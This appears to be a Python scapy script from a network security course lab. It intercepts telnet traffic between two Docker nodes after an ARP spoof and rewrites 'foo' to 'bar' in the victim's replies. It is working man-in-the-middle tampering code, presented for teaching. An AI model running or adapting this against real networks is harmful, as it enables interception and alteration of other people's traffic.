#!/usr/bin/env python3 from scapy.all import * # This program will intercept any data between the firewall node and the # metasploit node, and change any occurence of 'foo' to 'bar'. It requires # that the host this is running on be intercepting traffic, such as via an # ARP spoof. It also requires that IP forwarding be disabled # (set /proc/sys/net/ipv4/ip_forward to 0). # The example this is used for, shown at # https://aaronbloomfield.github.io/nws/slides/link-layer.html#/mitmarp # is telneting from the firewall node to the metasploit node. # # This code was adapted from code by Weiliang Du from # https://www.handsonsecurity.net/files/slides/N02_MAC_ARP.pptx # The host we are connecting from -- in our Docker setup, this is the firewall node FIREWALL_IP = "192.168.100.1" FIREWALL_MAC = "02:42:c0:a8:64:01" # The machine we are telnetting to -- in our Docker setup, this is metasploit VICTIM_IP = "192.168.100.3" VICTIM_MAC = "02:42:c0:a8:64:03" def spoof_pkt(pkt): # If the data is going from the victim node (metasploit) to the # originating node (firewall), we replace any instance of 'foo' with 'bar' if pkt[IP].src == VICTIM_IP and pkt[IP].dst == FIREWALL_IP: newpkt = IP(bytes(pkt[IP])) del(newpkt.chksum) del(newpkt[TCP].payload) del(newpkt[TCP].chksum) if pkt[TCP].payload: data = pkt[TCP].payload.load newdata = data.replace(b'foo',b'bar') if newdata != data: print("replaced") send(newpkt/newdata) else: send(newpkt) # If the data is going the other way -- from our originating node # (firewall) to the node being telnetted to (metasploit), we do not # modify the packets. elif pkt[IP].src == FIREWALL_IP or pkt[IP].dst == VICTIM_IP: newpkt = IP(bytes(pkt[IP])) del(newpkt.chksum) del(newpkt[TCP].chksum) send(newpkt) filter = "tcp and (ether src " + FIREWALL_MAC + " or ether src " + VICTIM_MAC + ")" pkt = sniff(iface='eth1', filter=filter, prn=spoof_pkt)